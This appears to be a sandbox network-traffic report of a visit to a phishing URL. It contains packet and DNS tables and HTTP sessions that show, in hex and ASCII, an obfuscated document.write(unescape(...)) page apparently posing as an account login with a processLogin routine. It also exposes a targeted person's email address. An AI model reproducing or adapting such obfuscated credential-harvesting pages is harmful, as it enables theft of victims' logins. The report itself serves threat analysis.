            Nov 21, 2024 09:50:37.230163097 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.230453014 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.230468035 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:37.542327881 CET4434981013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:37.542413950 CET4434981013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:37.542479992 CET49810443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.542804003 CET49810443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.542821884 CET4434981013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:37.542830944 CET49810443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.542839050 CET4434981013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:37.546644926 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.546689987 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:37.546753883 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.546987057 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:37.546998978 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.074384928 CET4434980913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.074460030 CET4434980913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.074667931 CET49809443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.074829102 CET49809443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.074846983 CET4434980913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.074861050 CET49809443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.074867964 CET4434980913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.078372002 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.078409910 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.078495026 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.078679085 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.078689098 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.248646021 CET44349790142.250.74.196192.168.2.4
            Nov 21, 2024 09:50:38.248753071 CET44349790142.250.74.196192.168.2.4
            Nov 21, 2024 09:50:38.248922110 CET49790443192.168.2.4142.250.74.196
            Nov 21, 2024 09:50:38.807869911 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.808600903 CET49812443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.808633089 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.809360027 CET49812443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.809370041 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.867050886 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.867710114 CET49811443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.867734909 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.868397951 CET49811443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:38.868412018 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:38.991192102 CET49790443192.168.2.4142.250.74.196
            Nov 21, 2024 09:50:38.991236925 CET44349790142.250.74.196192.168.2.4
            Nov 21, 2024 09:50:39.010967970 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.011733055 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.011760950 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.012403965 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.012408972 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.250309944 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.250381947 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.250447989 CET49812443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.250706911 CET49812443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.250732899 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.250747919 CET49812443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.250755072 CET4434981213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.254897118 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.254947901 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.255016088 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.255198956 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.255213022 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.320650101 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.320730925 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.320786953 CET49811443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.321050882 CET49811443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.321075916 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.321090937 CET49811443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.321096897 CET4434981113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.324948072 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.324985981 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.325058937 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.325339079 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.325352907 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.328793049 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.329374075 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.329413891 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.330092907 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.330105066 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.455073118 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.455192089 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.455250025 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.455455065 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.455482006 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.455513000 CET49813443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.455519915 CET4434981313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.459868908 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.459920883 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.459983110 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.460242987 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.460253000 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.772690058 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.772766113 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.772880077 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.773147106 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.773165941 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.773186922 CET49814443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.773192883 CET4434981413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.777245998 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.777297974 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.777374029 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.777580023 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.777592897 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.865422964 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.866152048 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.866175890 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:39.866878986 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:39.866883993 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.310524940 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.310595989 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.310683012 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.310920000 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.310920954 CET49815443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.310941935 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.310952902 CET4434981513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.315308094 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.315355062 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.315470934 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.315882921 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.315893888 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.977777958 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.978375912 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.978420973 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:40.979095936 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:40.979111910 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.111115932 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.111872911 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.111903906 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.112380981 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.112389088 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.177217960 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.177798986 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.177826881 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.178306103 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.178313971 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.413312912 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.413394928 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.413554907 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.413743973 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.413767099 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.413780928 CET49816443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.413786888 CET4434981613.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.416922092 CET49821443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.416990042 CET4434982113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.417308092 CET49821443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.417495012 CET49821443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.417512894 CET4434982113.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.492561102 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.493158102 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.493185043 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.493700981 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.493705988 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.552849054 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.552943945 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.553090096 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.553289890 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.553308964 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.553338051 CET49817443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.553344965 CET4434981713.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.556865931 CET49822443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.556910038 CET4434982213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.557100058 CET49822443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.557359934 CET49822443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.557373047 CET4434982213.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.611830950 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.611910105 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.612191916 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.612231970 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.612246990 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.612261057 CET49818443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.612267017 CET4434981813.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.615508080 CET49823443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.615569115 CET4434982313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.615642071 CET49823443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.615777969 CET49823443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.615794897 CET4434982313.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.927578926 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.927663088 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.927993059 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.928042889 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.928065062 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.928080082 CET49819443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.928086996 CET4434981913.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.935446978 CET49824443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.935486078 CET4434982413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:41.938945055 CET49824443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.938945055 CET49824443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:41.938985109 CET4434982413.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.103454113 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.104250908 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.104280949 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.104902983 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.104917049 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.546678066 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.546875000 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.546964884 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.547091961 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.547159910 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.547190905 CET49820443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.547207117 CET4434982013.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.550537109 CET49825443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.550585985 CET4434982513.107.246.45192.168.2.4
            Nov 21, 2024 09:50:42.550673008 CET49825443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.550909042 CET49825443192.168.2.413.107.246.45
            Nov 21, 2024 09:50:42.550925970 CET4434982513.107.246.45192.168.2.4
            TimestampSource PortDest PortSource IPDest IP
            Nov 21, 2024 09:49:22.968868971 CET53536951.1.1.1192.168.2.4
            Nov 21, 2024 09:49:23.044568062 CET53654631.1.1.1192.168.2.4
            Nov 21, 2024 09:49:24.115904093 CET5775453192.168.2.41.1.1.1
            Nov 21, 2024 09:49:24.116049051 CET6534853192.168.2.41.1.1.1
            Nov 21, 2024 09:49:24.366312981 CET53653481.1.1.1192.168.2.4
            Nov 21, 2024 09:49:24.379471064 CET53577541.1.1.1192.168.2.4
            Nov 21, 2024 09:49:25.283600092 CET53619851.1.1.1192.168.2.4
            Nov 21, 2024 09:49:26.812537909 CET53639331.1.1.1192.168.2.4
            Nov 21, 2024 09:49:26.976541996 CET4939953192.168.2.41.1.1.1
            Nov 21, 2024 09:49:26.976830959 CET4922853192.168.2.41.1.1.1
            Nov 21, 2024 09:49:27.202599049 CET53493991.1.1.1192.168.2.4
            Nov 21, 2024 09:49:27.202899933 CET53492281.1.1.1192.168.2.4
            Nov 21, 2024 09:49:29.643590927 CET5299353192.168.2.41.1.1.1
            Nov 21, 2024 09:49:29.643764019 CET6194153192.168.2.41.1.1.1
            Nov 21, 2024 09:49:29.644936085 CET5570753192.168.2.41.1.1.1
            Nov 21, 2024 09:49:29.645397902 CET5579053192.168.2.41.1.1.1
            Nov 21, 2024 09:49:29.869010925 CET53528301.1.1.1192.168.2.4
            Nov 21, 2024 09:49:29.869390011 CET53529931.1.1.1192.168.2.4
            Nov 21, 2024 09:49:29.869401932 CET53619411.1.1.1192.168.2.4
            Nov 21, 2024 09:49:29.894810915 CET53563051.1.1.1192.168.2.4
            Nov 21, 2024 09:49:29.902618885 CET53557071.1.1.1192.168.2.4
            Nov 21, 2024 09:49:29.903238058 CET53557901.1.1.1192.168.2.4
            Nov 21, 2024 09:49:32.127048969 CET53585581.1.1.1192.168.2.4
            Nov 21, 2024 09:49:34.368793964 CET53650841.1.1.1192.168.2.4
            Nov 21, 2024 09:49:35.153084040 CET138138192.168.2.4192.168.2.255
            Nov 21, 2024 09:49:42.214814901 CET53628731.1.1.1192.168.2.4
            Nov 21, 2024 09:50:01.294332981 CET53602461.1.1.1192.168.2.4
            Nov 21, 2024 09:50:22.466926098 CET53581321.1.1.1192.168.2.4
            Nov 21, 2024 09:50:23.684238911 CET53561701.1.1.1192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Nov 21, 2024 09:49:24.115904093 CET192.168.2.41.1.1.10x832eStandard query (0)voyages-moinschers.frA (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:24.116049051 CET192.168.2.41.1.1.10x9c43Standard query (0)voyages-moinschers.fr65IN (0x0001)false
            Nov 21, 2024 09:49:26.976541996 CET192.168.2.41.1.1.10xd5a1Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:26.976830959 CET192.168.2.41.1.1.10xfce0Standard query (0)www.google.com65IN (0x0001)false
            Nov 21, 2024 09:49:29.643590927 CET192.168.2.41.1.1.10x27d7Standard query (0)www.google.comA (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:29.643764019 CET192.168.2.41.1.1.10x52f4Standard query (0)www.google.com65IN (0x0001)false
            Nov 21, 2024 09:49:29.644936085 CET192.168.2.41.1.1.10xc10Standard query (0)www.idcom-france.comA (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:29.645397902 CET192.168.2.41.1.1.10xdfa2Standard query (0)www.idcom-france.com65IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Nov 21, 2024 09:49:24.379471064 CET1.1.1.1192.168.2.40x832eNo error (0)voyages-moinschers.fr185.221.216.102A (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:27.202599049 CET1.1.1.1192.168.2.40xd5a1No error (0)www.google.com142.250.74.196A (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:27.202899933 CET1.1.1.1192.168.2.40xfce0No error (0)www.google.com65IN (0x0001)false
            Nov 21, 2024 09:49:29.869390011 CET1.1.1.1192.168.2.40x27d7No error (0)www.google.com172.217.16.132A (IP address)IN (0x0001)false
            Nov 21, 2024 09:49:29.869401932 CET1.1.1.1192.168.2.40x52f4No error (0)www.google.com65IN (0x0001)false
            Nov 21, 2024 09:49:29.902618885 CET1.1.1.1192.168.2.40xc10No error (0)www.idcom-france.com213.186.33.5A (IP address)IN (0x0001)false
            • voyages-moinschers.fr
            • fs.microsoft.com
            • https:
              • www.google.com
            • slscr.update.microsoft.com
            • otelrules.azureedge.net
            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            0192.168.2.449736185.221.216.1024432472C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-11-21 08:49:25 UTC724OUTGET /request/index.html?userid=viviane.beigbeder@idcom-france.com HTTP/1.1
            Host: voyages-moinschers.fr
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            sec-ch-ua-platform: "Windows"
            Upgrade-Insecure-Requests: 1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: navigate
            Sec-Fetch-User: ?1
            Sec-Fetch-Dest: document
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-11-21 08:49:26 UTC207INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:49:26 GMT
            Server: Apache
            Last-Modified: Thu, 14 Nov 2024 12:06:19 GMT
            Accept-Ranges: bytes
            Content-Length: 26685
            Connection: close
            Content-Type: text/html
            2024-11-21 08:49:26 UTC7985INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 20 75 6e 65 73 63 61 70 65 28 20 27 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 34 43 25 36 46 25 36 37 25 36 39 25 36 45 25 32 30 25 37 34 25 36 46 25 32 30 25 37 39 25 36 46 25 37 35 25 37 32 25 32 30 25 36 31 25 36 33 25 36 33 25 36 46 25 37 35 25 36 45 25 37 34 25 33 43 25 32 46 25 37 34 25 36 39 25 37 34 25 36 43 25 36 35 25 33 45 25 30 41 25 32 30
            Data Ascii: <!DOCTYPE html><html> <script language="javascript"> document.write( unescape( '%3C%68%65%61%64%3E%0A%20%20%20%20%20%20%20%20%3C%74%69%74%6C%65%3E%4C%6F%67%69%6E%20%74%6F%20%79%6F%75%72%20%61%63%63%6F%75%6E%74%3C%2F%74%69%74%6C%65%3E%0A%20
            2024-11-21 08:49:26 UTC8000INData Raw: 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 37 33 25 36 39 25 37 41 25 36 35 25 33 41 25 32 30 25 33 31 25 33 34 25 37 30 25 37 38 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 36 36 25 36 46 25 36 45 25 37 34 25 32 44 25 36 36 25 36 31 25 36 44 25 36 39 25 36 43 25 37 39 25 33 41 25 32 30 25 34 31 25 37 32 25 36 39 25 36 31 25 36 43 25 32 43 25 32 30 25 34 38 25 36 35 25 36 43 25 37 36 25 36 35 25 37 34 25 36 39 25 36 33 25 36 31 25 32 43 25 32 30 25 37 33 25 36 31 25 36 45 25 37 33 25 32 44 25 37 33 25 36 35 25 37 32 25 36 39 25 36 36 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32
            Data Ascii: 0%20%20%20%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%34%70%78%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%41%72%69%61%6C%2C%20%48%65%6C%76%65%74%69%63%61%2C%20%73%61%6E%73%2D%73%65%72%69%66%3B%0A%20%20%20%20%20%20%20%20%2
            2024-11-21 08:49:26 UTC8000INData Raw: 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 30 25 37 32 25 36 46 25 36 33 25 36 35 25 37 33 25 37 33 25 34 43 25 36 46 25 36 37 25 36 39 25 36 45 25 32 38 25 32 39 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 33 42 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 37 44 25 32 39 25 33 42 25
            Data Ascii: 20%20%20%20%20%20%20%20%20%20%20%20%70%72%6F%63%65%73%73%4C%6F%67%69%6E%28%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%29%3B%
            2024-11-21 08:49:26 UTC2700INData Raw: 25 32 32 25 32 30 25 36 39 25 36 34 25 33 44 25 32 32 25 36 43 25 36 46 25 36 37 25 36 46 25 36 39 25 36 44 25 36 37 25 32 32 25 32 30 25 36 33 25 36 43 25 36 31 25 37 33 25 37 33 25 33 44 25 32 32 25 36 39 25 36 44 25 36 37 25 32 44 25 36 43 25 36 46 25 36 37 25 36 46 25 32 32 25 33 45 25 33 43 25 36 32 25 37 32 25 33 45 25 33 43 25 36 32 25 37 32 25 33 45 25 30 41 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 32 30 25 33 43 25 36 43 25 36 31 25 36 32 25 36 35 25 36 43 25 32 30 25 36 33 25 36 43 25 36 31 25 37 33 25 37 33 25 33 44 25 32 32 25 37 33 25 36 39 25 36 37 25 36 45 25 32 44 25 36 39 25 36 45 25 32 32 25 33 45 25 32 30 25 35 33 25 36 39 25 36 37 25 36 45
            Data Ascii: %22%20%69%64%3D%22%6C%6F%67%6F%69%6D%67%22%20%63%6C%61%73%73%3D%22%69%6D%67%2D%6C%6F%67%6F%22%3E%3C%62%72%3E%3C%62%72%3E%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%3C%6C%61%62%65%6C%20%63%6C%61%73%73%3D%22%73%69%67%6E%2D%69%6E%22%3E%20%53%69%67%6E


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.449741184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-11-21 08:49:29 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-11-21 08:49:29 UTC467INHTTP/1.1 200 OK
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
            Server: ECAcc (lpl/EF70)
            X-CID: 11
            X-Ms-ApiVersion: Distribute 1.2
            X-Ms-Region: prod-neu-z1
            Cache-Control: public, max-age=201362
            Date: Thu, 21 Nov 2024 08:49:29 GMT
            Connection: close
            X-CID: 2


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.449743184.28.90.27443
            TimestampBytes transferredDirectionData
            2024-11-21 08:49:31 UTC239OUTGET /fs/windows/config.json HTTP/1.1
            Connection: Keep-Alive
            Accept: */*
            Accept-Encoding: identity
            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
            Range: bytes=0-2147483646
            User-Agent: Microsoft BITS/7.8
            Host: fs.microsoft.com
            2024-11-21 08:49:31 UTC515INHTTP/1.1 200 OK
            ApiVersion: Distribute 1.1
            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
            Content-Type: application/octet-stream
            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
